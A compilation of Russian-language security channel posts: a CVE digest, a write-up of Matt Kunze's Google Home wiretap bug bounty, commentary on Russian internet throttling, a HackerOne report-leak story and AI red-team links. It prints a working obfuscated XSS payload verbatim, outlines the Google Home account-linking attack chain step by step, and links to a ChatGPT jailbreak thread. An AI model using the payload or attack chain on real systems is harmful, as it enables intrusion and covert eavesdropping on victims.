🔓 EXPLOIT‑дайджест

Пятница выдалась жаркой: пока многие жарят шашлыки, уязвимости жарят продакшн‑серверы.

— — —

1️⃣ RCE в WebDAV (CVE‑2025‑33053)
Один клик по специально сформированному .url — и удалённое выполнение кода на всех поддерживаемых версиях Windows. Microsoft уже выкатил патч, но PoC ходит по закрытым каналам.
Временная затычка: отключите службу WebClient и запретите WebDAV‑трафик на периметре.

2️⃣ «Три двойки» Cloudflare: 503 × 2 ч 28 мин
12 июня глобальный сбой уложил Workers KV, Access, Turnstile и часть дашборда. Причина — сбой стороннего хранилища.

3️⃣ WordPress Workreap ≤ 3.3.2 (CVE‑2025‑5012)
200 k+ сайтов открыты для произвольной загрузки файлов даже подписчиками. Кладём `resume.php` — получаем shell. Версия 3.3.3 уже содержит фикс; проверьте автообновление.

4️⃣ Google Сhrome залатал две high‑severity🚒 дыры — UAF (CVE‑2025‑5063) и OOB write (CVE‑2025‑5280). Госагентствам США приказано патчиться до 5 июня.

5️⃣ Pentest‑ИИ: PentestGPT vs Mindgard
• PentestGPT — терминальный «ментор», быстро штампует корявые payload‑ы, но буксует на lateral movement (на самом деле он просто не очень мягко говоря)
• Mindgard — взял «Лучший AI‑Sec стартап 2025», уже встроен в GitLab CI

Детекты походу лабу сделали на это)
Прикольный разбор
https://t.me/deteact/21

Привет Биконовцы!👋
Самым «кибер‑кинематографичным» баг‑баунти‑приключением последних пяти лет, без преувеличения, стала история исследователя‑одиночки Мэтта Кунзе и его Google Home Mini. За одиннадцать месяцев парень, вооружённый mitmproxy, Frida и стареньким рутованным Android‑смартфоном, превратил банальную колонку‑ассистента в многофункциональный жучок и получил от Google 107 500 $ — рекордную для IoT‑класса выплату.

Суть трюка: колонка доверяет любому «пользователю», чьи имя, сертификат и cloud ID будут отправлены на закрытый API Google. Эти три параметра легко вытаскиваются из локального HTTPS‑интерфейса устройства (порт 8443), если сначала перехватить трафик приложения Google Home. Кунзе снял SSL‑пиннинг Frida‑скриптом, увидел protobuf‑запрос deviceuserlinksbatch и воспроизвёл его Python‑скриптом, подменив данные на свои. Так он зарегистрировал «теневой» аккаунт, получив полный контроль над колонкой 

Дальше исследователь задался вопросом: «А можно ли сделать атаку бесследной и удалённой?» Ответ оказался «да». Шаг первый – обрушить Wi‑Fi жертвы парой deauth‑пакетов; Google Home сразу уходит в режим первоначальной настройки, поднимает открытый хот‑спот и на том же порту 8443 без аутентификации раздаёт всё то же имя‑сертификат‑cloud ID. Шаг второй – с любого интернета отправить знакомый protobuf‑линк на сервера Google Cast. После этого колонка готова исполнять команды злоумышленника из‑за океана, а сама жертва даже не подозревает, что в «друзьях» появился кто‑то ещё

Самый зрелищный вектор, описанный в репорте: злоумышленник создаёт рутину «Call +1‑555‑…» с точным временем запуска до секунды. В назначенный момент колонка сама набирает номер и превращается в беспроводной микрофон с неограниченным радиусом действия. Параллельно через те же облачные API можно сканировать локальную сеть, слать произвольные HTTP‑запросы и даже читать/писать файлы на устройстве – всё легально, ведь «новый пользователь» формально авторизован

Почему эта техника считается буквально воплощением хакерского искусства? Во‑первых, она ломает сразу три рубежа – BLE/Wi‑Fi, облако Google и физическое устройство – без эксплойтов нулевого дня; всё строится на нетривиальной комбинаторике легитимных функций. Во‑вторых, атака масштабируется: подобные smart‑спикеры десятками тысяч экспонируются в интернет из‑за кривых UPnP‑настроек маршрутизаторов. В‑третьих, репорт показал, что классические IoT‑грабли (открытый хот‑спот в режиме сетапа) прекрасно дожили до 2023 года и всё ещё дают RCE‑эффект. Google пришлось менять процесс линковки аккаунтов, урезать возможности рутин и закрывать 9222/CDP‑порт для локальных действий – редкий случай, когда баг‑баунти тянет почти на полноценный пентест экосистемы.

Для специалистов главный урок прост: если устройство умеет «привязывать» аккаунты через облако, считайте этот механизм вторым паролем и защитите его так же тщательно, как экран блокировки. А любителям баг‑баунти заметка в блокнот: сочетание MITM‑трафика, protobuf‑реверса и «физики» (deauth) до сих пор приносит шестизначные гонорары.

Список источников

1. Kunze M. Turning Google smart speakers into wiretaps for \$100k – 26 дек. 2022.
https://downrightnifty.me/blog/2022/12/26/hacking-google-home.html

2. Toulas B. Google Home speakers allowed hackers to snoop on conversations* – BleepingComputer, 29 дек. 2022.
https://www.bleepingcomputer.com/news/security/google-home-speakers-allowed-hackers-to-snoop-on-conversations

3. https://www.securityweek.com/researcher-says-google-paid-100k-bug-bounty-smart-speaker-vulnerabilities/ "Researcher Says Google Paid $100k Bug Bounty for Smart Speaker Vulnerabilities - SecurityWeek"

Ды вы охренели !

XSS payload, Cuneiform-alphabet based

"><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"

#этопотомучтовывцерковьнеходите

Пацаны защитил 2 диплома по двум вузам сегодня и вчера🥳, хочу сказать всем спасибо что вы такие крутые и поддерживали своими реакциями и комментариями на протяжении времени пока я учился, это укрепляло менталку и в целом показывало, что иду в правильном направлении. Вы лучшие подписчики и аудитория🥹
(А я обязательно отосплюсь сегодня ахах)

Btw - еще посылка пришла с розыгрыша https://t.me/sapronoff1
Обещал, что сделаю распаковку)

Подписчик, привет. Это я - твой единственный админ. Я на протяжении многих лет создавал иллюзию того, что в твоём аккаунте много каналов, но это был я. Сейчас напишу это сообщение с других каналов.

Об интернете в РФ. Короткая хроника

Российский сегмент интернета вступил в новую фазу самоизоляции. С 9 июня 2025 г. крупные провайдеры (Ростелеком, «Мегафон», «ВымпелКом», МТС, МГТС) режут любой трафик к сетям Cloudflare до символических 16 Кбайт на соединение. (link) Cloudflare фиксирует 50‑процентное падение трафика из РФ; идут не блоки, а тонкое формирование внутри DPI‑комплексов ТСПУ, развёрнутых Роскомнадзором на узлах связи. Внешне сайт «частично грузится», но дальше первого TCP‑окна всё умирает – идеальная дымовая завеса для обывателя (Опять американцы блочат!!!!🙂), но полный крах для веб‑приложений.

Что произошло раньше и как мы сюда пришли...

Февраль 2022 – блокировка Facebook/Instagram, старт экспресс‑развёртывания DPI.
Март 2023 – запрет «пропаганды VPN»; к концу года Роскомнадзор удаляет >6000 VPN‑сайтов.
Август 2024 – эксперименты по замедлению YouTube: средняя скорость падает вчетверо, создавая ажиотаж вокруг VK Видео
Сентябрь 2024 – правительство выделяет 60 млрд ₽ на модернизацию ТСПУ: добавить новые сигнатуры и повысить «эффективность против VPN» до 96 %
Март 2025 – локальная блокировка Telegram в Дагестане и Чечне, отработан механизм региональных «рубильников». (link)
Апрель 2025 – закон об отказе в рекламе на «заблокированных площадках» с сентября; монетизация иностранного контента становится "токсичной".
Июнь 2025 – «16 КБ‑занавес» против Cloudflare; параллельно из российских App Store массово исчезают мелкие VPN‑клиенты.

Почему Роскомнадзор снова «стрельнул себе в ногу»? C технической точки зрения.
Cloudflare обслуживает примерно пятую часть глобального веба, включая сотни российских компаний (интернет‑магазины, SaaS, банковские фронтенды). Ограничив её, регулятор одним выстрелом обрушил:
1) Cкорость интернета в РФ: пользователи переключаются на «толстые» VPN / обфускацию, а это нагружает DPI сильнее и ещё сильнее снижает пропускную способность для всего трафика.
2. Скорость легальных российских сервисов, вынужденных менять Cloudflare (продукт использующий весь мир) на отечественные (относительно новые) CDN‑«прокси»;
3. Самое смешное что многие телефоны и компьютеры внутренне имеют приложения которые сами по себе обращаются к сервисам под cloudflare

Итог - средняя «реальная» скорость внешних соединений из РФ в июне‑июле 2025‑го упала на 30–40 %, по данным NetBlocks и независимых мониторингов. Обрывочные «пакеты» заставляют браузеры и мобильные приложения агрессивно ретраить, создавая лавину лишнего мусора – провайдеры вынуждены поднимать цену на внешние каналы, а абонент чувствует «интернет как в 2007‑м».
Современная VPN‑картина в РФ. Трафик к популярным коммерческим VPN провайдерам уже давно блокируется подсетями, но теперь DPI режет и TLS ESNI, и маскировку под HTTPS/QUIC. Обход возможен (domain fronting, самописные obfs‑плагины ну и различные специфические протоколы), но цена – двойное шифрование → +20‑25 % латентности и потеря 10‑15 % пропускной. Чем сильнее РКН давит, тем медленнее «белый» сегмент для всех, включая госпорталы.

Все это сводится к тому - что сама инициатива безопасного интернета рушит экономику и замедляет общий интернет, как кажется регуляторам, под благими намерениями.

CatAttack - ai redtream)

#ai_redteam

https://www.reddit.com/r/ChatGPTJailbreak/comments/1ly6d6u/i_asked_gpt_to_create_a_research_study_on_the/

(Ради кликбейта🙃: chatgpt провело исследование как себя сломать)

#MLSecOps
#Whitepaper
#Sec_code_review
"Do AI Coding Assistants Make Bad Coders Worse? A Security Evaluation of GitHub Copilot", 2025.

// This paper examines whether the overall security posture of a project affects the quality of the code produced by Copilot. It compares Copilot's output in two distinct environments: one that adheres to secure coding practices and another with known vulnerabilities.

🤯 HackerOne случайно слили приватные репорты через... публичные репозитории GitHub

Ресёрчер w2w наткнулся на несколько GitHub-профилей вида h1_analyst_*, которые принадлежали triage-командам HackerOne. В них нашлось более 40 публичных репозиториев с PoC-скриптами и workflow-файлами. Внутри — готовые эксплойты для IDOR, утечек access-token и даже RCE в продуктах, которые участвовали в закрытых программах. Фактически, это были полные тексты ещё нераскрытых отчётов.

🤦‍♂️ Как такое вообще могло произойти?
Всё дело в классической OPSEC-ошибке. Для проверки багов триажеры создавали публичные форки и репозитории, а после тестов просто забывали их удалять или переводить в private. Профили имели предсказуемые имена, а найти их можно было через обычную user-enumeration в интерфейсе GitHub, подставляя email-адреса на домене @wearehackerone.com.

💥 Импакт — настоящий подарок для злоумышленников.
Любой мог подписаться на изменения в этих репозиториях и в реальном времени получать свежие эксплойты, пока клиенты HackerOne ещё работали над патчами. Это открывало возможность для массового «zero-day farming» и перехвата CI/CD-секретов прямо из логов GitHub Actions. Атака была тривиальной, а ущерб для клиентов мог быть колоссальным.

💰 Что в итоге?
Сначала репорт пытались отклонить, назвав данные «тестовыми», но ресёрчер доказал обратное. После долгой переписки и чистки репозиториев HackerOne выплатила $2700 + бонус.

Эта история — отличное напоминание, что даже на стороне экспертов по безопасности случаются проколы, и как важно всегда подчищать за собой тестовые артефакты.

🔗 Полный разбор этой истории и все технические детали читайте на нашем сайте:
eh.su/reports/128